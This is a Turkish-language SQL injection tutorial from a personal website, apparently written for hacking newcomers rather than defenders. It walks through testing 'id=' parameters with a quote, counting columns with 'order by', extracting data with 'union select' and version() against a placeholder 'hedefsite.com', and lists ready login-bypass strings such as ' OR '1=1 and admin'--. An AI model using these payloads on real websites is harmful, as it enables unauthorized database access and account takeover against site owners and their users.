İBRAHİM HALİL TURAN KİŞİSEL WEB SİTESİ

sql temel anlatim

Selamun Aleyküm Kardeşler ..
Bugün Sizlere Elimden Geldiği İlmimin Yettiği Kadarıyla Temel SQL’dan Bahsedeceğim , Hemen Başlayalım .

SQL Nedir ?

SQL (Structured Query Language) veritabanlarında database çekme,
silme vs.. gibi işlemler için kullanılan bir dildir.
Bugün hemen hemen tüm web uygulamalarının altyapısında
veritabanı desteği vardır ve bu web uygulamaları veritabanı
ile SQL aracılığıyla anlaşırlar.

SQL İnj. Giriş

Evet Arkadaşlar SQL Açığı Nerelerde Olur , SQL Açığı ’ID=’ Değerlerinden Sonra Olur . Biz Bir Sitede SQL Açığı Olup Olmadığını Anlamak İçin Sitenin Sonuna ’,’a Gibi İşaretler Koyarız Site Eğer Hata Verirse SQL Açığı Mevcuttur .

Örnek ’ İşareti Resmi ;

Örnek Hata Resmi ;

Kolon Sayısı Bulma ?

Bir Sitede Kolon Sayısını Bulmak İçin
’order+by’ Komutundan Yararlanırız . Örnek Vermek Gerekirse
Siteni Kolon Sayısı 5 Olsun Oda Şöyle Olur ;

http://www.hedefsite.com/index.php?sayfa=yazar&id=11+order+by+5

Örnek Video’yu Aşağıdaki Link’ten Online Olarak İzleyebilirsiniz .

onLİNE VİDEOYU İZLE .

Kolonları Ekrana Vurdurma ?

Kolonları Ekrana Vurdurmak İçin İse
union+select+1,2,3,4,5 Komutunu Kullanacağız . Neden 5 Kadar Yazdın Derseniz Kolon Sayımız 5’ti Hatırlarsak , Oda Şöyle Olur ;

http://www.hedefsite.com/index.php?sayfa=yazar&id=11+union+select+1,2,3,4,5

Örnek Resim ;

onLİNE VİDEOYU İZLE .

Version İsteme , İstememizdeki Amaç ?

Version MYSQL İnj’da Çekilir . Version İstememizdeki Amaç Sitenin Versiyonu’na Göre İzliceğimiz Yol Değişebilir .
Mesela Sitenin Versiyonu 4 ise Verileri Deneme-Yanılma-Sınama Yoluyla Açıcağız.
Ama Versiyonumuz 5 İse Direk Verileri Çekebiliriz .

Version Nasıl İsteriz ?

Version 2 Türlü İsteriz ;
version() ve
@@version
Şeklinde İsteyebiliriz. Ekrana Vuran Sayılarımız Kaçtı 3’tü Biri 3. Numaradan İstiyelim

Örnek Vermek Gerekirse ;

http://www.hedefsite.com/index.php?sayfa=yazar&id=11+union+select+1,2,version(),4,5

http://www.hedefsite.com/index.php?sayfa=yazar&id=11+union+select+1,2,@@version(),4,5

onLİNE VİDEOYU İZLE .

Engel Aşma ve Login Bypass ?

Şimdi Bazen Girersin Kolon Sayılarını vs.. Ama Ekrana Birtürlü
Sayılar Yansımaz Bunu Nasıl Aşarız İşlemi Bitirerek. İşlemi Nasıl Bitiririz ;
-- İşareti İle Örnek Vermek Gerekirse ;

http://www.hedefsite.com/index.php?sayfa=yazar&id=11+union+select+1,2,3,4,5--

Login Bypass İse Database’deki İlk Kaydı Getirmeye Yarar Bazı Kodlar Vardır Bu Kodlar Şöyle
Özetlenebilir ;
’or’
’ OR ’1=1
admin’--
’ or 0=0 --
" or 0=0 --
or 0=0 --
Ve Dahada Çoğaltılabilir Kardeşler ..

onLİNE VİDEOYU İZLE .

SQL Temel Eğitimin Sonuna Geldik Umarım Faydalı Olmuştur.

Anlatım: De4THBLoW

$(document).ready(function (){ //Gri $('a#a1').click(function(){ $('body').css("background-image","url(https://img.webme.com/pic/x/xmert96x/110.gif)"); ;}); //Pembe $('a#a2').click(function(){ $('body').css("background-image","url(https://img.webme.com/pic/d/doktordizayn/82.gif)") }); //Sarı $('a#a3').click(function(){ $('body').css("background-image","url(https://img.webme.com/pic/x/xmert96x/70.gif )") ;}); //Yesil $('a#a4').click(function(){ $('body').css("background-image","url(https://img.webme.com/pic/x/xmert96x/78.gif)"); ;}); //Kahverengi $('a#a5').click(function(){ $('body').css("background-image","url(https://img.webme.com/pic/x/xmert96x/110.gif)"); ;}); }); Arka Plan Seç
Gri
Pembe
Sarı
Yesil
Kahverengi #linkler{ padding:3px; position:fixed; float:left; border:solid #000000 2px; top:15px; left:5px; background-color:white; } #linkler:hover{ background-color: #C9C9C9;} #linkler a{ margin-left:4px;text-decoration:none;} #linkler a:hover{ color:black; margin-left:7px;} #a1{ color:gray;} #a2{color:pink;} #a3{color:yellow;} #a4{color:green;} #a5{color:brown;}

İBRAHİM HALİL TURAN KİŞİSEL WEB SİTESİ

sql temel anlatim

» Kategoriler

» En son eklenen konular

» REKLAMLAR

» Reklam Alanı

» Sayac

» Dost siteler

» Toplist

» Tasarımcı Hakkında